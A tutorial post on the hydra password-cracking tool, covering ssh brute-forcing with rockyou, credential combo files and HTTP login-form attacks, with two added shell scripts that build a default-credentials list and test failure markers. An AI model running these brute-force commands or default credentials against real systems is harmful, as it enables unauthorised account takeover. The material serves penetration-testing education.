hydra – the multi-protocol online cracker

What is it?

When you want to brute-force an online service, hydra is one of the go-to tools.

It supports a wide spectrum of services: ssh, mysql, ftp, http forms and many more.

You can use wordlists for both usernames and passwords, or you can let hydra generate the candidates itself with the brute-force feature (-x).

Using wordlists is usually the way to go.

If you run hydra with the -h switch for help you get, among the complete list of features and options, a list of supported services:

adam6500 asterisk cisco cisco-enable cvs firebird ftp[s] http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] memcached mongodb mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp

So – very versatile.

Let's start with an easy example:

SSH

Since ssh is the usual remote administration interface, it is good practice to test password strength against wordlists.

The syntax couldn’t be simpler:

hydra -l <username> -P <wordlist> ssh://<hostname>

-l stands for the username and -p for the password. Both switches exist in lowercase and uppercase form: the lowercase version takes a single username or password, while the uppercase version (-L, -P) takes a wordlist.

So this means

hydra -l john -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.25

So we are trying to guess john's password (a single user, lowercase -l) using the rockyou list (a wordlist, uppercase -P).

The service is ssh and lastly we have the IP. Simple as that.

hydra -L /usr/share/wordlists/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.25

Here we provide a list for both usernames and passwords. Hydra then tries every password for every username, so the number of attempts is the product of the two list lengths.

If you have a file with usernames and passwords already paired up like this

<username>:<password>

you can use the -C switch instead of -l/-L and -p/-P. Each line is tried as exactly one login attempt, which avoids the full cross product when you already know which password belongs to which account (default credentials, leaked credentials).

You get the idea: as simple as it is powerful.
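As an added example (not code from the original post), the script below builds a login:pass combo file for -C, checks that every line has the shape hydra expects, reports how many attempts will be made and prints the ssh invocation with the options worth having: -t 4 because hydra itself warns that sshd usually limits parallel sessions, -f to stop at the first hit, -V to see every attempt and -o to keep the result. The credentials, file names and host are constructed for the example.

```shell
#!/bin/sh
# Added example, not code from the original post. Builds a login:pass combo
# file for hydra -C, checks its format, and prints the ssh invocation.
# The credentials, file names and host below are constructed/invented.

# Constructed sample input: one login:pass pair per line, the format -C expects.
make_combo_file() {
  cat >"$1" <<'EOF'
admin:admin
admin:password
root:toor
pi:raspberry
EOF
}

# Count lines that are not usable as login:pass. hydra splits each line at
# the first colon, so a line needs a colon and a non-empty login; an empty
# password after the colon is left to hydra. Echoes the number of bad lines.
validate_combo_file() {
  bad=0
  while IFS= read -r line; do
    case "$line" in
      :*) bad=$((bad + 1)) ;;   # empty login
      *:*) ;;                   # login:pass, fine
      *)  bad=$((bad + 1)) ;;   # no colon at all (includes blank lines)
    esac
  done <"$1"
  echo "$bad"
}

# With -C hydra makes exactly one attempt per line; with -L and -P it makes
# |users| x |passwords| attempts. Knowing the count up front matters when the
# target enforces account lockout.
count_attempts() {
  wc -l <"$1" | tr -d ' '
}

# Build the command. -t 4: hydra warns that many sshd configurations limit
# parallel sessions and recommends four tasks; -f: stop after the first valid
# pair; -V: print every attempt; -o: write hits to a file.
hydra_ssh_cmd() {
  printf 'hydra -C %s -t 4 -f -V -o found.txt ssh://%s\n' "$1" "$2"
}

main() {
  dir=$(mktemp -d)
  make_combo_file "$dir/combos.txt"
  if [ "$(validate_combo_file "$dir/combos.txt")" != 0 ]; then
    echo "combo file has malformed lines" >&2
    exit 1
  fi
  echo "attempts hydra will make: $(count_attempts "$dir/combos.txt")"
  # Only printed here; run it yourself against a host you are allowed to test.
  hydra_ssh_cmd "$dir/combos.txt" 10.10.10.25
}

main
```

The format check is worth the few lines: a line without a colon is silently useless, and a password that itself contains a colon will be cut at the first one, so such pairs are better tested with -l and -p individually.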

HTTP(S)

Most services work like ssh. For FTP, for example, you just put ftp instead of ssh and it works the same way.

For HTTP things get a little more complicated.

One option is that we have an HTML form.

Something like this

<form id="login" method="post" action="login">
<input type="text" name="user" id="Uname" placeholder="Username">
<input type="Password" name="pass" id="Pass" placeholder="Password">
</form>

Then our command would look like this

hydra -l <user> -P <wordlist> 10.10.10.25 http-post-form "/login:user=^USER^&pass=^PASS^:failed"

The first part is pretty obvious by now: we have the user, password and host.

After that we tell hydra that we want to attack an HTML form submitted with the POST method. For a site served over TLS use https-post-form instead, and -s <port> if the service is not on the default port.

The last parameter has three parts separated by colons:

"/login:user=^USER^&pass=^PASS^:failed"

The first part, /login, is the path we send the POST request to. It comes from the form's action attribute.

Then comes the HTTP POST body. user and pass are the parameter names taken from the name attributes of the form's inputs (not the id attributes).

^USER^ and ^PASS^ are placeholders that hydra replaces with the usernames and passwords we provided in the first part of the command.

The last part, failed, is the condition string: a piece of text that tells hydra the login was not successful. Hydra does a plain substring match on the response, so the text must appear exactly like that (case included) in every failed-login response and never in a successful one; if it is missing from a failed response, hydra reports that attempt as a valid login. When the failure page has no reliable marker but the success page does, prefix the string with S= (for example S=Welcome) to make hydra look for success instead.

Now hydra has everything it needs:

Which request to make to which server, the path to call, the parameters to send and how to tell whether a login was successful or not.
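Before running the command above it pays to verify the condition string against real responses, because a wrong one produces either no hits or a hit for every guess. The script below is an added example, not code from the original post: it checks a candidate failure marker (and an S= success marker) against two constructed response bodies standing in for the server's answers, then assembles the http-post-form argument. The path, field names and host are the invented ones from the walkthrough.

```shell
#!/bin/sh
# Added example, not code from the original post. Before pointing hydra at a
# form, check that the chosen condition string actually separates failed
# logins from successful ones. The two responses below are constructed
# samples standing in for what the server returns; the path, field names and
# host are invented.

# Constructed response body for a wrong password.
failed_response() {
  cat <<'EOF'
<html><body>
<p class="error">Login failed. Please check your username and password.</p>
<form id="login" method="post" action="login">...</form>
</body></html>
EOF
}

# Constructed response body for a correct password.
success_response() {
  cat <<'EOF'
<html><body>
<h1>Welcome back, admin</h1>
<a href="/logout">Log out</a>
</body></html>
EOF
}

# hydra treats the third field as a failure marker (the default, also written
# F=...) and does a plain substring match on the response. The marker must be
# present in every failed response and absent from the successful one:
# if it is missing from a failed response, that attempt is reported as a hit.
# Echoes "ok", "missing-on-failure" or "present-on-success".
check_failure_string() {
  if ! failed_response | grep -qF -- "$1"; then
    echo missing-on-failure
  elif success_response | grep -qF -- "$1"; then
    echo present-on-success
  else
    echo ok
  fi
}

# Same check for a success marker (S=...): it must appear only on success.
check_success_string() {
  if ! success_response | grep -qF -- "$1"; then
    echo missing-on-success
  elif failed_response | grep -qF -- "$1"; then
    echo present-on-failure
  else
    echo ok
  fi
}

# Assemble the http-post-form argument: path:body:condition, with ^USER^ and
# ^PASS^ where hydra should substitute the credentials.
form_spec() {
  printf '%s:%s=^USER^&%s=^PASS^:%s' "$1" "$2" "$3" "$4"
}

main() {
  for s in 'failed' 'Login failed' '<html>' 'invalid'; do
    printf 'failure marker %-14s -> %s\n' "'$s'" "$(check_failure_string "$s")"
  done
  printf 'success marker %-14s -> %s\n' "'Welcome back'" "$(check_success_string 'Welcome back')"

  spec=$(form_spec /login user pass 'Login failed')
  # Printed only; use https-post-form (or -S) for TLS and -s for a non-default port.
  printf 'hydra -l admin -P rockyou.txt -f -V 10.10.10.25 http-post-form "%s"\n' "$spec"
}

main
```

In practice you get the two reference responses by submitting one known-bad and, if you have a test account, one known-good login with curl or the browser's developer tools, and then run the check against those saved bodies instead of the constructed ones here.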
